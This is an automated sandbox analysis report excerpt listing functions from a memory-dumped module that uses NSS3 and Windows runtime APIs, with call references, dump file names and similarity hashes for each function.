Part of subcall function 6CE0CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CE0CB26

memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6CE6FDFE), ref: 6CE6FFDF
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6CE6FDFE), ref: 6CE7001C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6CE6FDFE), ref: 6CE7006F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
String ID:
API String ID: 2358433136-0
Opcode ID: afb627279b72171f726641742f793bfcacbc10450348c0fe957f74c3b4c4183f
Instruction ID: c9126257d84610b2d5a29f1d279fb24edb2961080d30ed0e0dfbd0b191c62dfb
Opcode Fuzzy Hash: afb627279b72171f726641742f793bfcacbc10450348c0fe957f74c3b4c4183f
Instruction Fuzzy Hash: 7841D0B1F002059BDF48DFA4D889BAEB775FF4A318F14052DD90693740DB3AA941CBA1

Function 6CEF3D40 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,-0000002C,?,6CEF127F,?), ref: 6CEF3D89

Part of subcall function 6CEF06F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6CEF2E70,00000000), ref: 6CEF0701

SECOID_FindOID_Util.NSS3(FFFFFFFF,?), ref: 6CEF3DD3

Part of subcall function 6CEE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CE88298,?,?,?,6CE7FCE5,?), ref: 6CEE07BF
Part of subcall function 6CEE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CEE07E6
Part of subcall function 6CEE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE081B
Part of subcall function 6CEE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE0825

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Error$HashLookupTableUtil$Alloc_ConstFind
String ID:
API String ID: 99596740-0
Opcode ID: 428b25853b186c6411f318e539782b5d6419e227fc92b910f4977f2b8dd6e12b
Instruction ID: 7853cf1d370d812fabe2086408264f0f90c2cb37a907dcc36d62639d92349d61
Opcode Fuzzy Hash: 428b25853b186c6411f318e539782b5d6419e227fc92b910f4977f2b8dd6e12b
Instruction Fuzzy Hash: 3131F475A0261497FB148619D840B597279AF423ACF38063ADE35C7FC1EB22EC4786E3

Function 6CF57DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF57E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF57EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF57EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CF57ED8

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: 2e44745b3ef4d456a0976932f0c1633610825147eff9e7ff66aa1d5203fdcb0e
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: E131B3B2B112118FDB04CF08D8919DABBE2FF8831871B816AC9589B711EB71EC55CBD1

Function 6CF0DF00 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 6CE93090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CEAAE42), ref: 6CE930AA
Part of subcall function 6CE93090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE930C7
Part of subcall function 6CE93090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CE930E5
Part of subcall function 6CE93090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE93116
Part of subcall function 6CE93090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE9312B
Part of subcall function 6CE93090: PK11_DestroyObject.NSS3(?,?), ref: 6CE93154
Part of subcall function 6CE93090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE9317E

SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CF0DBBD), ref: 6CF0DFCF
SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF0DFEE

Part of subcall function 6CEA86D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA8716
Part of subcall function 6CEA86D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA8727
Part of subcall function 6CEA86D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CEA873B
Part of subcall function 6CEA86D0: PR_Unlock.NSS3(?), ref: 6CEA876F
Part of subcall function 6CEA86D0: PR_SetError.NSS3(00000000,00000000), ref: 6CEA8787

Part of subcall function 6CECF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CECF854
Part of subcall function 6CECF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CECF868
Part of subcall function 6CECF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CECF882
Part of subcall function 6CECF820: free.MOZGLUE(04C483FF,?,?), ref: 6CECF889
Part of subcall function 6CECF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CECF8A4
Part of subcall function 6CECF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CECF8AB
Part of subcall function 6CECF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CECF8C9
Part of subcall function 6CECF820: free.MOZGLUE(280F10EC,?,?), ref: 6CECF8D0

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6CF0DBBD), ref: 6CF0DFFC
PR_SetError.NSS3(FFFFE013,00000000,?,?,6CF0DBBD), ref: 6CF0E007

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
String ID:
API String ID: 3730430729-0
Opcode ID: 7aceaec0ee479cec3f0225e7f2bfa54344ecf9409a3ddc2ca67829190469f52f
Instruction ID: 45e4572476a4bf2dead89cc1e7f95a29ee32564bd9a3f2936929af2a13af5e41
Opcode Fuzzy Hash: 7aceaec0ee479cec3f0225e7f2bfa54344ecf9409a3ddc2ca67829190469f52f
Instruction Fuzzy Hash: 7B3107B1B0020157E7109A79AC94A9B73B89F5470EF144139EA09C7B12FF35D918D3E2

Function 6CEF2C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6CEF1289,?), ref: 6CEF2D72

Part of subcall function 6CEF3390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6CEF2CA7,E80C76FF,?,6CEF1289,?), ref: 6CEF33E9
Part of subcall function 6CEF3390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6CEF342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CEF1289,?), ref: 6CEF2D61

Part of subcall function 6CEF0B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CEF0B21
Part of subcall function 6CEF0B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CEF0B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6CEF1289,?), ref: 6CEF2D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6CEF1289,?), ref: 6CEF2DAF

Part of subcall function 6CEAB8F0: PR_CallOnceWithArg.NSS3(6CFE2178,6CEABCF0,?), ref: 6CEAB915
Part of subcall function 6CEAB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6CEAB933
Part of subcall function 6CEAB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6CEAB9C8
Part of subcall function 6CEAB8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CEAB9E1

Part of subcall function 6CEF0A50: SECOID_GetAlgorithmTag_Util.NSS3(6CEF2A90,E8571076,?,6CEF2A7C,6CEF21F1,?,?,?,00000000,00000000,?,?,6CEF21DD,00000000), ref: 6CEF0A66

Part of subcall function 6CEF3310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6CEF2D1E,?,?,?,?,00000000,?,?,?,?,?,6CEF1289), ref: 6CEF3348

Part of subcall function 6CEF06F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6CEF2E70,00000000), ref: 6CEF0701

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: 1cd79ddb5905848014c97da3165a38fdb247d3f9dbdf19f1ae2209dd28a1bea2
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: 5A31ECB6900245ABDB009E64DC44A9A3775AF5531DF340134EC345B792F732E92AC7B2

Function 6CE86C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CE86C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CE86CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CE86CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CFA8FE0), ref: 6CE86CFE

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 84f7bca804c2888f2b4cad8bb94b0cb03e9bddfcd7b294b5159da00c387039ab
Instruction ID: ab3813d5a28a2c2042adf3946ace7aaa7344f3d0d3a145d58292694bf0506067
Opcode Fuzzy Hash: 84f7bca804c2888f2b4cad8bb94b0cb03e9bddfcd7b294b5159da00c387039ab
Instruction Fuzzy Hash: 5D3183B1A012169FDB04DF65C851ABFB7F9EF49248F20442DD909D7750FB719905CBA0

Function 6CF94F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6CF94F5D
free.MOZGLUE(?), ref: 6CF94F74
free.MOZGLUE(?), ref: 6CF94F82
GetLastError.KERNEL32 ref: 6CF94F90

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: a475f6e56bdedf696f3628ce229c021c8ef00fb516a36298fc7dd4209ff379fd
Instruction ID: 10ec33a032f31139702b8de5b642c936c7aa835937d7bfd3c915468047c32f66
Opcode Fuzzy Hash: a475f6e56bdedf696f3628ce229c021c8ef00fb516a36298fc7dd4209ff379fd
Instruction Fuzzy Hash: 6F31FB75A0061A5BFF01CB69DC45BDFB7B8EF4535CF050229EC26A7781DB34E9048691

Function 6CEF6DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6CEF6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEF6E57

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6CEF6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6CEF6EAA

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: e561cecb0224ad4b6606bc9e262f8726ba5b4fb33f5aab028c324303e2f38320
Instruction ID: 605f30724ef5977fa6e8757a12c1caae4373005a729358fd22c29e2cea9c19d5
Opcode Fuzzy Hash: e561cecb0224ad4b6606bc9e262f8726ba5b4fb33f5aab028c324303e2f38320
Instruction Fuzzy Hash: 38318133610512EBDB145E34D904396B7B8AB0531EF30463DD4AAD6B81EB317A5ACF91

Function 6CEDDDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6CEDDDB1,?,00000000), ref: 6CEDDDF4

Part of subcall function 6CEE14C0: TlsGetValue.KERNEL32 ref: 6CEE14E0
Part of subcall function 6CEE14C0: EnterCriticalSection.KERNEL32 ref: 6CEE14F5
Part of subcall function 6CEE14C0: PR_Unlock.NSS3 ref: 6CEE150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6CEDDDB1,?,00000000), ref: 6CEDDE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6CEDDDB1,?,00000000), ref: 6CEDDE17

Part of subcall function 6CEE0BE0: malloc.MOZGLUE(6CED8D2D,?,00000000,?), ref: 6CEE0BF8
Part of subcall function 6CEE0BE0: TlsGetValue.KERNEL32(6CED8D2D,?,00000000,?), ref: 6CEE0C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6CEDDE80

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: 3b9bdac20055786abb77421c26de6ab9f581861c8bab9ee4b9a0450b2375b731
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: A331AFB5D006429BE700CF56C880656B7B4BFA531CB26822ADC1887B01EB70F2A5CFA0

Function 6CECFE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CEA5ADC,?,00000000,00000001,?,?,00000000,?,6CE9BA55,?,?), ref: 6CECFE4B
EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CECFE5F
PR_Unlock.NSS3(78831D74), ref: 6CECFEC2
PR_SetError.NSS3(00000000,00000000), ref: 6CECFED6

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: c6c589297400546d151c7601c5732c3396432c89b7e88d9c60a7c99afaa6b620
Instruction ID: 21d2619f0cbbcf80345509e899ccecabe42ded997f15a445e8621d4067748a97
Opcode Fuzzy Hash: c6c589297400546d151c7601c5732c3396432c89b7e88d9c60a7c99afaa6b620
Instruction Fuzzy Hash: 6C212D31F00625AFDB40AA74D90479A77B8BF0536CF240125ED14A7B42E738E864CBD2

Function 6CED3F50 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6CED3440: PK11_GetAllTokens.NSS3 ref: 6CED3481
Part of subcall function 6CED3440: PR_SetError.NSS3(00000000,00000000), ref: 6CED34A3
Part of subcall function 6CED3440: TlsGetValue.KERNEL32 ref: 6CED352E
Part of subcall function 6CED3440: EnterCriticalSection.KERNEL32(?), ref: 6CED3542
Part of subcall function 6CED3440: PR_Unlock.NSS3(?), ref: 6CED355B

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6CEBE80C,00000000,00000000,?,?,?,?,6CEC8C5B,-00000001), ref: 6CED3FA1
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6CEBE80C,00000000,00000000,?,?,?,?,6CEC8C5B,-00000001), ref: 6CED3FBA
PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6CEBE80C,00000000,00000000,?,?,?,?,6CEC8C5B,-00000001), ref: 6CED3FFE
PR_SetError.NSS3 ref: 6CED401A

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
String ID:
API String ID: 3021504977-0
Opcode ID: dadc7c0a3be8f049449e6909edc34a9d7364159473a6252a1f315f7213abf205
Instruction ID: 036037fc784c5246b95d6cfd63e8c5332469b942eb8b77a99a873642e4c8d3d0
Opcode Fuzzy Hash: dadc7c0a3be8f049449e6909edc34a9d7364159473a6252a1f315f7213abf205
Instruction Fuzzy Hash: 673183719047048FDB40AF79D18426EBBF1FF89318F12492ED98987700EB34E885CB92

Function 6CEC4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6CECB60F,00000000), ref: 6CEC5003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6CECB60F,00000000), ref: 6CEC501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6CECB60F,00000000), ref: 6CEC504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6CECB60F,00000000), ref: 6CEC5064

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: df0b1e4ef9ac79653b60af26947ba5d4905aa1eba8a764bd846cd1d3c4501d84
Instruction ID: 338ca46e7ed8d72f21691324d4ac17a6220509f16960f1a0900b0170f4060744
Opcode Fuzzy Hash: df0b1e4ef9ac79653b60af26947ba5d4905aa1eba8a764bd846cd1d3c4501d84
Instruction Fuzzy Hash: 58312BB4A05A069FDB40EF68C58566ABBF4FF08308B11456DD969D7701EB30E890CBD2

Function 6CEE9F80 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6CEEA71A,FFFFFFFF,?,?), ref: 6CEE9FAB

Part of subcall function 6CEE14C0: TlsGetValue.KERNEL32 ref: 6CEE14E0
Part of subcall function 6CEE14C0: EnterCriticalSection.KERNEL32 ref: 6CEE14F5
Part of subcall function 6CEE14C0: PR_Unlock.NSS3 ref: 6CEE150D

PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6CEEA71A,6CEEA71A,00000000), ref: 6CEE9FD9

Part of subcall function 6CEE1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CE8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE7F599,?,00000000), ref: 6CEE136A
Part of subcall function 6CEE1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CE8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE7F599,?,00000000), ref: 6CEE137E
Part of subcall function 6CEE1340: PL_ArenaGrow.NSS3(?,6CE7F599,?,00000000,?,6CE8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE7F599,?), ref: 6CEE13CF
Part of subcall function 6CEE1340: PR_Unlock.NSS3(?,?,6CE8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE7F599,?,00000000), ref: 6CEE145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,6CEEA71A,6CEEA71A,00000000), ref: 6CEEA009
PR_SetError.NSS3(FFFFE013,00000000,6CEEA71A,6CEEA71A,00000000), ref: 6CEEA045

